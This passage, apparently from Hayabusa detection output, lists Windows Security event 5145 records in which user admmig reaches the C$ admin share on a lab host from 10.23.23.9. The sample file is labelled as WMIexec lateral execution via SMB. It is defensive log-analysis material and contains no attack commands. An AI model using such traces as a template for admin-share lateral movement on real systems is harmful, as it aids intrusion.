Windows\assembly\NativeImages_v4.0.30319_64\AuditPolicy42d3d2cc# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.409 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\AuditPolicy42d3d2cc#\9fe5c370593d72077c6ebc935bdccaf8 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.435 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\blbmmc | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.435 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\blbmmc\5965cfde76afc1f5c5d70d32fe0c7270 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.435 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: 
Windows\assembly\NativeImages_v4.0.30319_64\blbproxy | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.435 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\blbproxy\9efa8cc0254efc497ae439914bbe9207 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.435 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\blbwizfx | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.435 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\blbwizfx\8feba1d1646b72a4bc348315fa7bad6b | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.435 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: 
Windows\assembly\NativeImages_v4.0.30319_64\ComSvcConfig | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.435 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\ComSvcConfig\44570ea6e616aa8a35b0768a4336f69d | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.450 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\CustomMarshalers | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.450 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\CustomMarshalers\a5132d26ad1468bf7b6b89725e4cefce | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.466 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: 
Windows\assembly\NativeImages_v4.0.30319_64\dfsvc | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.466 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\dfsvc\a086b75bb1e8ee361af6ed079a6b77b4 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.466 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\EmbeddedLockdown | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.466 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\EmbeddedLockdown\870a6acacd5e95c0ffca82696cdb1d38 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.466 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: 
Windows\assembly\NativeImages_v4.0.30319_64\EventViewer | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.466 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\EventViewer\dc4701b2db7cf17a8b91db454a97c991 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.466 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\ipamapi | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.482 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\ipamapi\dae9598a3b2d70231e340696e284163f | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.497 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: 
Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.A3ec156ec# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.497 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.A3ec156ec#\e6ff20c47a7e849012d7ce8bdd777896 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.529 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.A26c32abb# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.529 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.A26c32abb#\e58c4e8c63c0494a59885d5502339144 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.529 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | 
Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Abf69f55a# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.529 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Abf69f55a#\9f5bb7b6ff9da9d2a0649311aef761e8 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.544 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.B22c61a69# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.544 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.B22c61a69#\a9e1bbb2f77ddf73fdc37769da51597e | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.544 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ 
| Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.B46c55d17# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.544 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.B46c55d17#\acca0c1913cd50d9cfb935bc3fdcb23d | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.544 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.B83e9cb53# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.544 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.B83e9cb53#\84fa86c4d86aa17ce68c75a1625383e0 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.575 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: 
\??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.B3325a29b# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.575 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.B3325a29b#\11e47175268433f2afe5bf68ea4899ae | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.575 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Baa2ca56b# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.575 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Baa2ca56b#\44884740e6e261405b0440efde616082 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.607 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share 
Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Bfc9dc24d# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.607 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Bfc9dc24d#\465ef4c9fe7c77ed5384c3c379fbe9b3 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.607 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Build | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.607 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Build\a7bcc49edef862e86e95e8959d30ae67 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.607 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: 
\??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.C8d726d22# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.607 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.C8d726d22#\7a53b2a7d76ecfa30210cf5ead782971 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.622 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.C25dcfcb8# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.622 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.C25dcfcb8#\02acbf854b27f2d83aa9eec6e1f6135a | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.622 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share 
Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.C26a36d2b# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.622 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.C26a36d2b#\69e2093b3cec29bdd3c9fbba83990dfe | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.638 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Ca018eff0# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.638 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Ca018eff0#\dd2dddd8e337402ac96330a8d24120d6 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.638 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | 
Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.CSharp | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.638 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.CSharp\3df09428e1087ca282100efc481a9947 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.638 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.D0ff51f83# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.638 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.D0ff51f83#\93e744bcb19dc3206bfff080448a94e1 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.638 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share 
Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.G46fcc235# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.654 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.G46fcc235#\8b051a98022e8b354053e87e1dcaf2f0 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.663 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.G91a07420# | IP Addr: 10.23.23.9 | LID: 